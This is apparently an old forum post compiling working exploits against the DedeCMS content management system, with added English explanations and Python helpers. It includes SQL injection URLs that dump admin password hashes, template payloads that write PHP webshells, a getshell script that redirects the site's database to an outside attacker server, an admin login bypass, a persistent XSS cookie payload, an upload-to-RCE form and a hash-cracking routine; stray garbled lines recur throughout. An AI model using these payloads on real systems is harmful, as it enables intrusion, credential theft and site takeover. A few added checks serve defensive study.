DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14

Dedecms 5.6 rss.php SQL injection
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
Error-based injection through the _Cs[] array parameter: updatexml() fails with an XPATH error whose message carries the concatenated value, so the MySQL error text shows [uname:hash], where hash is characters 4 to 19 of the stored admin password (see the note on the password format under advancedsearch.php further down).

DedeCms v5.6 embedded malicious code execution
Register a member account and post a software entry; in the local address (本地地址) field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
Once posted, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php (eC5waHA decodes to x.php) containing <?php eval($_POST[xiao])?>baidu, i.e. a one-line shell whose POST parameter is xiao.

Dede 5.6 GBK SQL injection
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
This is the wide-byte trick: the multibyte bytes placed right before the quote matter, because on a GBK-charset site the backslash that addslashes() puts in front of ' is swallowed as the second byte of a GBK character, leaving the quote unescaped.


" x) }5 @& Q6 |5 Q8 U' a+ c1 n$ T7 o8 m3 d
# f/ e1 [/ |2 t+ l# P, {

. P6 C6 B1 j6 A$ z: i$ q# e
' D+ v& q. u# f1 W) I# ~
% y8 T, W: m7 [2 [- Q+ p# U4 `1 [! g) A: i9 L0 R

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL execution
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The sql parameter is executed as given; %23@__ decodes to #@__, DedeCMS's table-prefix placeholder, which the code rewrites to the configured prefix (dede_ by default), so the query reads the admin table.

DEDECMS (all versions) gotopage variable XSS
1. Open the URL below: the XSS fires and installs the "XSS rootkit". Note that IE8/9 block URL-type XSS, so their XSS filter has to be switched off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on any visit to either of the URLs below triggers our XSS, because the decoded script stores the payload in a cookie named gotopage and login.php reflects that cookie value just as it reflects the query parameter.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php


8 L, p) v& H" J  D  ~5 U6 a8 q! F# a' f
DeDeCMS (织梦) variable overwrite getshell
#!/usr/bin/php
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache   aid=2 shellpath= /   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns the first line of the response; "HTTP/1.1 200 OK" puts "OK" at offset 13,
// so this only proves the request was answered, not that the shell was actually written.
if (strpos($exp,"OK")>12){
echo "Exploit Success \n";
if($aid==1)echo "Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// _COOKIE[GLOBALS][cfg_db*] redirects the site's database connection to the attacker's MySQL
// server (184.105.174.114 in the original), whose dede_mytag row carries the {dede:php} payload.
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "No response from ".$host."\n";
return '';
}
fwrite($ock,$data);
$exp=fgets($ock, 1024);   // status line only; the original loop returned on its first iteration as well
fclose($ock);
return $exp;
}
?>

DedeCms v5.6-5.7 unauthorised access (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
(织梦网站后台 in the URL stands for the site's backend directory.)
Replace validate=dcug with the current captcha value and you are logged into the backend: the _POST[GLOBALS][cfg_db*] parameters point the login at the attacker's own MySQL server, which is where the admin/inimda account exists.
Prerequisite: you must already know the backend directory path.

Dedecms tag remote file write
Prerequisite: prepare your own dede database and insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit the form below; the shell ends up as 1.php in the same directory. Work the principle out yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction()">
<!-- onsubmit was missing: addaction() below copies the doaction URL into the form action, otherwise the form posts to itself -->
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="Submit" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
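The PHP script above, this form, and the login.php bypass further up all rely on the same thing: DedeCMS copies request parameters into PHP variables, and a key such as _COOKIE[GLOBALS][cfg_dbhost] arrives as a nested array whose top-level name is _COOKIE, so a filter that only inspects top-level names for cfg_ or GLOBALS never sees the dangerous key. The Python below is an added example, not DedeCMS code: it parses a form body into nested dicts the way PHP builds $_POST, then contrasts a shallow filter with a recursive one. The exact regex the vulnerable version used is an assumption; the request body is the one the PHP exploit sends, with www.site.com from its usage example as the host.

```python
import re
from urllib.parse import parse_qsl

# Request body sent by the exploit script above (copied from the post; the DB host is the attacker's MySQL server).
EXPLOIT_BODY = (
    "doaction=http%3A%2F%2Fwww.site.com%2Fplus%2Fmytag_js.php%3Faid%3D1"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit"
    "&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_"
    "&nocache=true&QuickSearchBtn=%CC%E1%BD%BB"
)

KEY_RE = re.compile(r"^([^\[]+)((?:\[[^\]]*\])*)$")
BRACKET_RE = re.compile(r"\[([^\]]*)\]")


def php_parse_query(body: str) -> dict:
    """Build nested dicts from a[b][c]=v keys, mirroring how PHP populates $_GET/$_POST/$_COOKIE."""
    result = {}
    for key, value in parse_qsl(body, keep_blank_values=True, errors="replace"):
        m = KEY_RE.match(key)
        if not m:
            continue
        parts = [m.group(1)] + BRACKET_RE.findall(m.group(2))
        node = result
        for part in parts[:-1]:
            if part == "":                      # a[] appends at the next free index
                part = str(len(node))
            if not isinstance(node.get(part), dict):
                node[part] = {}
            node = node[part]
        last = parts[-1] if parts[-1] != "" else str(len(node))
        node[last] = value
    return result


# Assumed shape of the weak filter: top-level names only, and only cfg_/GLOBALS.
SHALLOW_BANNED = re.compile(r"^(cfg_|GLOBALS)")
# Recursive filter: any key, at any depth, that could name a superglobal or a cfg_ setting.
DEEP_BANNED = re.compile(r"^(cfg_|GLOBALS|_GET|_POST|_COOKIE)")


def shallow_check(params: dict) -> list:
    """Keys the weak filter would reject: the exploit body yields none, so it passes."""
    return [k for k in params if SHALLOW_BANNED.match(k)]


def deep_check(params: dict, path=()) -> list:
    """Slash-joined paths of every banned key found at any nesting level."""
    hits = []
    for k, v in params.items():
        here = path + (k,)
        if DEEP_BANNED.match(k):
            hits.append("/".join(here))
        if isinstance(v, dict):
            hits.extend(deep_check(v, here))
    return hits


if __name__ == "__main__":
    parsed = php_parse_query(EXPLOIT_BODY)
    print("shallow:", shallow_check(parsed))
    print("deep:   ", deep_check(parsed))
```

Run stand-alone it prints an empty list for the shallow filter and the full chain _COOKIE, _COOKIE/GLOBALS, _COOKIE/GLOBALS/cfg_dbhost, ... for the recursive one. The same parser handles the _Cs[][1] style keys used by the rss.php payload at the top of this post.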
Dedecms <= V5.6 Final template execution
1. Register a user, go to the member area, post an article and upload an image; then, in attachment management, replace the image with our crafted template. Say the image is named:
uploads/userup/2/12OMX04-15A.jpg
Template content (prefix it with gif89a if the image format is checked):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just posted, view the page source and build a form like this one (the templet and dede_addonfields fields are the crafted part):
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>Edit article</strong></h3>
<div class="postForm">
<label>Title:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>Tags:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(comma separated)
<label>Author:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>Category:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test category</option>
</select> <span style="color:#F00">*</span>(coloured categories cannot be selected)
<label>My category:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>Summary:</label>
<textarea name="description" id="description">1111111</textarea>
(brief description of the content)
<label>Thumbnail:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(crafted here)
</div>
<!-- form action area -->
<h3 class="meTitle">Content</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>Captcha:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="Can't read it? Click to refresh" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">Submit</button>
<button class="button2 ml10" type="reset">Reset</button>
</div>
</div>
</form>
Submit; if it reports that the edit succeeded, the template path has been changed. 3. Visit the edited article:
Assuming the edited article's aid is 2, just open:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is written into the plus directory.

DEDECMS Get Shell (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >Change</button>
</form>
Build the form above; after the upload the image is saved as /uploads/userup/3/1.gif
Post an article, then build the edit form as follows:

- r/ |/ y" S+ s1 |& z/ Y( S) V+ e( K! p; ?4 {
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>Select a category...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">Submit</button>
</form>

- I& Q* l: s8 b$ [# ?. Y4 a) }1 Y+ |' a

6 V" z" u% E' T: i/ z- \' p5 ~. @

9 D9 {: f4 c6 d8 y8 a2 r6 \/ c" e4 W% h7 w" w8 N

# j% X2 s! ]9 _. E% h- Z: B8 P% f, L8 ?; P2 i' T

% n7 K7 G6 e$ ~( ?5 D  Z. C( d7 @( K) R9 i: M6 S& U, P6 v
: P/ S( t9 Q5 \- @' L& D6 G7 D

Dedecms V5.6 remote file deletion
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
The oldface path is used as given, so the ../ segments climb out of the user's own upload directory and delete a file elsewhere in the site.

Dedecms V5.6 plus/carbuyaction.php local file inclusion
http://www.test.com/plus/carbuya ... urn&code=../../

2 ^! l& s$ c2 R: V9 O& K& u
6 y; k. Q. r  U' x1 O+ B. m4 R9 l6 [* V  ?) a2 r! H4 b
! F" |$ \! f$ t

6 @2 a: \5 V. f5 x
+ a5 X, ?  q5 P  n( T
  ^" V+ o* j2 @* R4 U8 m4 a5 }1 N9 O0 h6 d
' N" i# F7 b( A: R0 y
' R' @  }4 Y2 I. a
' q! M% C7 i& K6 T; c4 m+ q
Note on the admin password returned by the advancedsearch.php query above: the pwd column is the 32-character MD5 with the first 5 and the last 7 characters removed, i.e. a 20-character value; drop 3 more in front and 1 at the end and you have the standard 16-character MD5.
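The two hash notes in this post describe the same slice: MID(pwd,4,16) in the rss.php payload at the top and "drop 3 in front, 1 at the end" here both turn the 20-character stored value into the ordinary 16-character MD5. The Python below is an added example, not from the post: it pulls the [uname:hash] pair out of the XPATH error text that updatexml() produces, normalises a DedeCMS stored hash (32, 20 or 16 characters) to the 16-character form, and checks candidate passwords against it. The error string and the stored hash are constructed from md5("admin"), not taken from any real site; the regular expression is my own.

```python
import hashlib
import re

# Constructed: what the rss.php updatexml() payload returns for a default admin/admin account.
# md5("admin") = 21232f297a57a5a743894a0e4a801fc3; DedeCMS stores characters 6-25 -> f297a57a5a743894a0e4,
# and MID(pwd,4,16) of that is 7a57a5a743894a0e, the usual 16-character MD5.
SAMPLE_ERROR = "XPATH syntax error: '[admin:7a57a5a743894a0e]'"
SAMPLE_PWD20 = "f297a57a5a743894a0e4"

LEAK_RE = re.compile(r"\[([^\[\]:]+):([0-9a-fA-F]{16,32})\]")


def parse_xpath_leak(error_text: str):
    """Return (username, hash) from the [uname:hash] marker in a MySQL XPATH error, or None."""
    m = LEAK_RE.search(error_text)
    return (m.group(1), m.group(2).lower()) if m else None


def md5_16(password: str) -> str:
    """Standard 16-character MD5: characters 9-24 of the 32-character digest."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()[8:24]


def dede_pwd_to_md5_16(stored: str) -> str:
    """Normalise a DedeCMS stored hash (32, 20 or 16 characters) to the 16-character MD5."""
    stored = stored.strip().lower()
    if len(stored) == 32:
        return stored[8:24]
    if len(stored) == 20:          # 32-char digest minus 5 leading and 7 trailing characters,
        return stored[3:19]        # so drop 3 more in front and 1 at the end
    if len(stored) == 16:
        return stored
    raise ValueError("unexpected hash length %d" % len(stored))


def check_candidate(password: str, stored: str) -> bool:
    """True if `password` hashes to the stored value in any of the three forms."""
    return md5_16(password) == dede_pwd_to_md5_16(stored)


def crack(stored: str, wordlist):
    """Return the first word in `wordlist` that matches, or None."""
    target = dede_pwd_to_md5_16(stored)
    for word in wordlist:
        if md5_16(word) == target:
            return word
    return None


if __name__ == "__main__":
    user, leaked = parse_xpath_leak(SAMPLE_ERROR)
    print(user, leaked, crack(leaked, ["123456", "password", "admin"]))
```

Feeding the 16-character value to a cracker is enough; there is no need to reconstruct the missing 16 characters of the full digest, and the same normalisation applies whether the hash came from the rss.php error, the advancedsearch.php query or the feedback_js.php union further down.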
Dedecms 5.1 feedback_js.php injection
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='


0 z( {4 y6 c: J/ i2 r# g  k! p6 |' z! r- y7 O% n
" ]) f. J; b) w  }$ @# ^" F

6 k# I; ?' J0 P3 g( [4 ?7 G, f# {. w/ K  i6 e3 W6 r
% |" r$ ~# F2 }- N& W1 O& ^

8 W' j( E7 G$ Z) h5 k
9 x9 X' Y7 G; V1 O1 U! s# a: k! K5 ^- n' U

Dedecms select_soft_post.php uninitialised variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='OK' />
</form>
<br />It's just an exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game, get a webshell at /data/cache/fly.php...<br />
</body>
</html>
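Both the edit_face.php deletion above (oldface=/uploads/userup/8/../../../member/...) and this select_soft_post.php upload (cfg_basedir='../../' together with cfg_imgtype='php' and newname='fly.php') come down to the server trusting a client-supplied path and file type. The check below is an added example of what those scripts lack, not DedeCMS code: it normalises the requested path, refuses anything that escapes the caller's own upload directory, and decides the permitted upload extensions from a fixed server-side allowlist instead of a request parameter. The directory names come from the two payloads; the root directory and the allowlist are assumptions.

```python
import posixpath
from urllib.parse import unquote

UPLOAD_ROOT = "/uploads/userup"                       # assumed: per-user directories live here
ALLOWED_UPLOAD_EXT = {"gif", "jpg", "jpeg", "png"}    # fixed server-side allowlist, never taken from the request


def confine(user_dir: str, requested: str):
    """Resolve `requested` against the user's own directory and return the normalised
    absolute path, or None if the result would lie outside that directory."""
    base = posixpath.normpath(posixpath.join(UPLOAD_ROOT, user_dir))
    requested = unquote(requested)              # %2e%2e is still ".."
    if requested.startswith("/"):
        target = posixpath.normpath(requested)  # absolute form, as edit_face.php receives oldface
    else:
        target = posixpath.normpath(posixpath.join(base, requested))
    return target if target == base or target.startswith(base + "/") else None


def delete_target(user_dir: str, oldface: str):
    """Path a safe version of edit_face.php?dopost=delold would unlink, or None to refuse."""
    return confine(user_dir, oldface)


def upload_target(user_dir: str, newname: str):
    """Path a safe upload handler would write, or None if the name or extension is refused.
    The name must be a bare file name (no directory part) with an allowlisted extension."""
    decoded = unquote(newname)
    name = posixpath.basename(decoded)
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if name != decoded or ext not in ALLOWED_UPLOAD_EXT:
        return None
    return confine(user_dir, name)


if __name__ == "__main__":
    print(delete_target("8", "/uploads/userup/8/../../../member/templets/images/m_logo.gif"))
    print(upload_target("3", "fly.php"), upload_target("3", "1.gif"))
```

The traversal payload normalises to /member/templets/images/m_logo.gif, which is not under /uploads/userup/8, so it is refused; fly.php is refused on extension before the path is even looked at. A production handler would also rename the stored file server-side rather than keep the client's name at all.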

, }' e. E. s/ ~0 u
6 v! ], F+ R% K/ {* }+ ]9 N. ~9 |" x: s

+ p1 d) ?6 b: Y- M: ~: e8 N7 |; {/ P  Z4 |" w2 l- x; w' S, W  u

6 j+ O# S9 o& \: @5 A0 X* x* p* a, @# s. b4 A

8 L0 L$ t' \: h( i; a( t! m0 @3 n' [

Dedecms 5.3 – 5.5 plus/digg_frame.php injection
Uses a MySQL numeric overflow to force an error, together with the fact that DEDECMS logs database errors into a PHP file without validating the file header.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown.
2. Visit
http://www.abc.com/data/mysql_error_trace.php ; seeing the following proves the injection worked (the leading int(3) is the output of the injected var_dump(3), so the PHP embedded in the logged error is executing).
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar; note that the form's action is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After pressing OK, seeing the step-2 output means the trojan is in place.


: o/ i: f6 P7 _  f+ z. U( S# G
. G; a* Y" [6 J" }; K/ G# z  J* n& C* u! F/ {! q* \2 X

# I' x, v$ O* E2 a1 K  E. w" D% A/ C4 z2 D" P# D( e
* y$ }; N7 C1 a" E" n4 [; g

) }5 h. _) {8 E7 e# N/ w
3 o" Z  i2 [" w' T* v) s
" y7 y- ^3 w! r$ R6 b( T+ {. V6 q
4 A) `6 E$ K0 T1 G! n4 D

* r# e/ W# i7 i) J织梦(DedeCms)plus/infosearch.php 文件注入漏洞* O1 S. Y/ p. h* I: Z
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
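The %cf' at the start of the q parameter is the same wide-byte trick as the GBK injection in member/index.php further up: PHP's addslashes() turns ' into \' (bytes 5C 27), but when MySQL decodes the query as GBK the lead byte 0xCF and the 0x5C after it form one double-byte character, and the quote is left bare. The Python below is an added example, not from the post: it reproduces addslashes() on raw bytes and shows which inputs come out of a GBK decode with an unescaped quote. The SQL statement wrapped around the value is assumed.

```python
def addslashes(data: bytes) -> bytes:
    """Byte-level equivalent of PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


QUERY_PREFIX = "SELECT id FROM dede_archives WHERE title='"   # assumed query shape


def build_query(user_input: bytes, charset: str) -> str:
    """Escape the value, embed it in the assumed query, and decode it the way the DB would."""
    sql = QUERY_PREFIX.encode("ascii") + addslashes(user_input) + b"'"
    return sql.decode(charset, errors="replace")


def unescaped_quotes(fragment: str) -> int:
    """Count single quotes not protected by a backslash (a backslash escapes the next character)."""
    count, i = 0, 0
    while i < len(fragment):
        if fragment[i] == "\\":
            i += 2
            continue
        if fragment[i] == "'":
            count += 1
        i += 1
    return count


def injectable(user_input: bytes, charset: str) -> bool:
    """True if, after escaping and charset decoding, the user value still contains a bare quote."""
    decoded = build_query(user_input, charset)
    value = decoded[len(QUERY_PREFIX):-1]       # strip the fixed prefix and the closing quote
    return unescaped_quotes(value) > 0


if __name__ == "__main__":
    for sample in (b"\xcf'", b"\xbf' or 1=1#", b"abc'"):
        print(sample, "gbk:", injectable(sample, "gbk"), "utf-8:", injectable(sample, "utf-8"))
```

Under GBK decoding the \xcf\x5c pair becomes a single CJK character and the following quote terminates the string literal, so `%cf' union select ...` works exactly as the URL above shows; under UTF-8 the backslash survives and the quote stays escaped. The fix is to escape with a function that knows the connection charset (mysql_real_escape_string after mysql_set_charset, or, better, prepared statements) rather than addslashes().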